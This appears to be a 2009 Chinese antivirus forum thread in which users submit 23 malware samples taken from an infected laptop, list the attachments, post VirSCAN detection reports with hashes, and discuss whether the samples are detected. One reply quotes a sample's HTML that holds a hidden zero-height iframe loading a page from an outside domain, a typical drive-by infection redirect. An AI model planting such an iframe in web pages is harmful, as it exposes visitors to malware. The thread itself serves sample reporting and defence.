12345   1  /  5  页   跳转

23枚样本 11枚安全 10枚病毒 2枚分析中

收藏
panchengwei
头像
卡卡巡查
  • 帖子:6328
  • 注册: 2007-10-23
  • 来自:
祖国六十华诞就爱不长大论坛9周年纪念09欢乐圣诞世界杯勋章
发表于: 2009-09-05 11:20 | 只看楼主 短消息 资料
字号: 1楼

23枚样本 11枚安全 10枚病毒 2枚分析中

XP SP3
IE 8
22.00.00.86
22.11.05.01

RIS 未报
Avast 4.8报病毒和恶意

样本均来自被感染安装了XP SP3,RAV/RFW 2009的笔记本。
问题机目前为登录界面输入密码提示登录,随机立刻注销。
相关问题和胖子、瑞工20在线沟通过。
样本提取方式为从盘扫面提取。
提取前2010对从盘进行了扫面,
提取工作由Avast4.8完成。


用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 1.7; (R1 1.5))

附件附件:

文件名:6[1].rar
下载次数:267
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:092[1].js.rar
下载次数:338
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0035425.rar
下载次数:238
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0035426.rar
下载次数:243
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0035433.rar
下载次数:280
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0035434.rar
下载次数:256
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0048828.rar
下载次数:231
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0048836.rar
下载次数:237
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0140231.rar
下载次数:282
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0140269.rar
下载次数:223
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:A0140270.rar
下载次数:202
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:a[1].jpg.rar
下载次数:284
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:b[1].jpg.rar
下载次数:284
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:dsound.rar
下载次数:214
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:dxxz[1].rar
下载次数:316
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:f[1].jpg.rar
下载次数:265
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:olepro32.rar
下载次数:242
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:Qvod.rar
下载次数:231
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

附件附件:

文件名:tete313859t.rar
下载次数:273
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:20:10
描述:rar

最后编辑panchengwei 最后编辑于 2009-09-09 10:50:45
分享到:
gototop
 
panchengwei
头像
卡卡巡查
  • 帖子:6328
  • 注册: 2007-10-23
  • 来自:
祖国六十华诞就爱不长大论坛9周年纪念09欢乐圣诞世界杯勋章
发表于: 2009-09-05 11:24 | 只看楼主 短消息 资料
字号: 2楼

回复: 23枚86版RIS未报病毒样本

继续上传样本

附件附件:

文件名:yt[1].rar
下载次数:287
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:23:44
描述:rar

附件附件:

文件名:ytfl1[1].rar
下载次数:282
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:23:44
描述:rar

附件附件:

文件名:yut[1].rar
下载次数:325
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:23:44
描述:rar

附件附件:

文件名:url[1].jpg.rar
下载次数:214
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-5 11:23:44
描述:rar
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2009-09-05 11:24 | 短消息 资料
字号: 3楼

回复:23枚86版RIS未报病毒样本

第一个附件中的内容:

<html>
<iframe src="http://gd1di.cn/x48/xx.html" width=111 height=0 border=0></iframe>
<br>

<script type="text/javascript" src="http://tongji.linezing.com/1242634/tongji.js"></script>
</html>

这种东西,也算病毒?

上图:


最后编辑baohe 最后编辑于 2009-09-05 11:25:03
gototop
 
baohe
头像
大版主
  • 帖子:72578
  • 注册: 2003-04-10
  • 来自:
年度优秀版主奖端午辟邪香囊卡卡名人堂就爱不长大论坛9周年纪念09欢乐圣诞十周年年度风云人物2012我眼中的你们茶馆劳模瑞星金牌用户十一周年勋章
发表于: 2009-09-05 11:28 | 短消息 资料
字号: 4楼

回复:23枚86版RIS未报病毒样本

第二个附件,在俺的Tiny监控下不能运行(所有动作均被Tiny阻截)。RIS2010能否守住,不清楚。

最后编辑baohe 最后编辑于 2009-09-05 11:29:34
gototop
 
Palkia
头像
强壮不惑狮
  • 帖子:1079
  • 注册: 2009-01-20
  • 来自:Subspace
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-09-05 11:30 | 短消息 资料
字号: 5楼

回复:23枚86版RIS未报病毒样本

为什么不打成一包上报。。。
gototop
 
panchengwei
头像
卡卡巡查
  • 帖子:6328
  • 注册: 2007-10-23
  • 来自:
祖国六十华诞就爱不长大论坛9周年纪念09欢乐圣诞世界杯勋章
发表于: 2009-09-05 11:45 | 只看楼主 短消息 资料
字号: 6楼

回复: 23枚86版RIS未报病毒样本

RS20090905112305734025
RS20090905112352921707
RS20090905112430734176<病毒
RS20090905112509265746<病毒
RS20090905112543250847<病毒

RS20090905112714640819
RS20090905112804281013<病毒
RS20090905112845281450<病毒
RS20090905113000531955
RS20090905113047203589<病毒

RS20090905113122484799<病毒
RS20090905113153359681
RS20090905113227703334
RS20090905113305812962<病毒
RS20090905113335109457

RS20090905113403343613
RS20090905113434000084<病毒
RS20090905113729796886
RS20090905113821421093<病毒
RS20090905113854375574

RS20090905113926515846
RS20090905114017187182
RS20090905114051281228
最后编辑panchengwei 最后编辑于 2009-09-09 10:46:41
gototop
 
panchengwei
头像
卡卡巡查
  • 帖子:6328
  • 注册: 2007-10-23
  • 来自:
祖国六十华诞就爱不长大论坛9周年纪念09欢乐圣诞世界杯勋章
发表于: 2009-09-05 12:45 | 只看楼主 短消息 资料
字号: 7楼

回复: 23枚86版RIS未报病毒样本



引用:
原帖由 baohe 于 2009-9-5 11:24:00 发表
第一个附件中的内容:

<html>
<iframe src="http://gd1di.cn/x48/xx.html" width=111 height=0 border=0></iframe>
<br>

<script type="text/javascript" src="h


VirSCAN.org Scanned Report :
Scanned time  : 2009/09/05 12:33:00 (CST)
Scanner results: 8%的杀软(3/37)报告发现病毒
File Name      : 6[1].rar
File Size      : 237 byte
File Type      : RAR archive data, v1d, os
MD5            : 9995a69e887fed779a6d1a01332fc585
SHA1          : 0988f58de16b081b201f8505d2c7919a70fc079a
Online report  : http://virscan.org/report/cfddd8a710647354dd5e8bc38b867c20.html

Scanner results: 8%的杀软(3/37)报告发现病毒
云=安全
最后编辑panchengwei 最后编辑于 2009-09-09 10:54:28
gototop
 
panchengwei
头像
卡卡巡查
  • 帖子:6328
  • 注册: 2007-10-23
  • 来自:
祖国六十华诞就爱不长大论坛9周年纪念09欢乐圣诞世界杯勋章
发表于: 2009-09-05 12:50 | 只看楼主 短消息 资料
字号: 8楼

回复: 23枚86版RIS未报病毒样本

VirSCAN.org Scanned Report :
Scanned time  : 2009/09/05 12:39:17 (CST)
Scanner results: 51%的杀软(19/37)报告发现病毒
File Name      : 092[1].js.rar
File Size      : 510 byte
File Type      : RAR archive data, v1d, os
MD5            : bd9b3ec9fd44e42339f14e8aecf97d87
SHA1          : 43b27f96d99499faccfe5e5aa270f53ea73d1ecb
Online report  : http://virscan.org/report/3271796afe5f054013f9456f9cf1f829.html

Scanner results: 51%的杀软(19/37)报告发现病毒
云=安全
最后编辑panchengwei 最后编辑于 2009-09-09 10:57:22
gototop
 
panchengwei
头像
卡卡巡查
  • 帖子:6328
  • 注册: 2007-10-23
  • 来自:
祖国六十华诞就爱不长大论坛9周年纪念09欢乐圣诞世界杯勋章
发表于: 2009-09-05 12:55 | 只看楼主 短消息 资料
字号: 9楼

回复: 23枚86版RIS未报病毒样本

VirSCAN.org Scanned Report :
Scanned time  : 2009/09/05 12:45:42 (CST)
Scanner results: 11%的杀软(4/37)报告发现病毒
File Name      : A0035425.rar
File Size      : 40121 byte
File Type      : RAR archive data, v1d, os
MD5            : 68bc09cca29bbe1152073622c7f1cc1f
SHA1          : da674b1a1ec88d96b3c42e66f84bf9d961d2cfb0
Online report  : http://virscan.org/report/b9e7f3aaa5b3b6a5223b2fab2f743ad8.html


云=病毒
最后编辑panchengwei 最后编辑于 2009-09-09 10:58:51
gototop
 
panchengwei
头像
卡卡巡查
  • 帖子:6328
  • 注册: 2007-10-23
  • 来自:
祖国六十华诞就爱不长大论坛9周年纪念09欢乐圣诞世界杯勋章
发表于: 2009-09-05 13:00 | 只看楼主 短消息 资料
字号: 10楼

回复:23枚86版RIS未报病毒样本

VirSCAN.org Scanned Report :
Scanned time  : 2009/09/05 12:51:02 (CST)
Scanner results: 8%的杀软(3/37)报告发现病毒
File Name      : A0035426.rar
File Size      : 135610 byte
File Type      : RAR archive data, v1d, os
MD5            : 76a76b07bee7cfc9d22403dbbb04950e
SHA1          : a5d008c7d99c0e4b43d6490c052351dcf725fbc8
Online report  : http://virscan.org/report/1a7e7167f7e9a9d35e4b1a53e70d67dc.html


云=病毒
最后编辑panchengwei 最后编辑于 2009-09-09 10:59:49
gototop
 
<<上一主题|下一主题>>
12345   1  /  5  页   跳转
页面顶部
Powered by Discuz!NT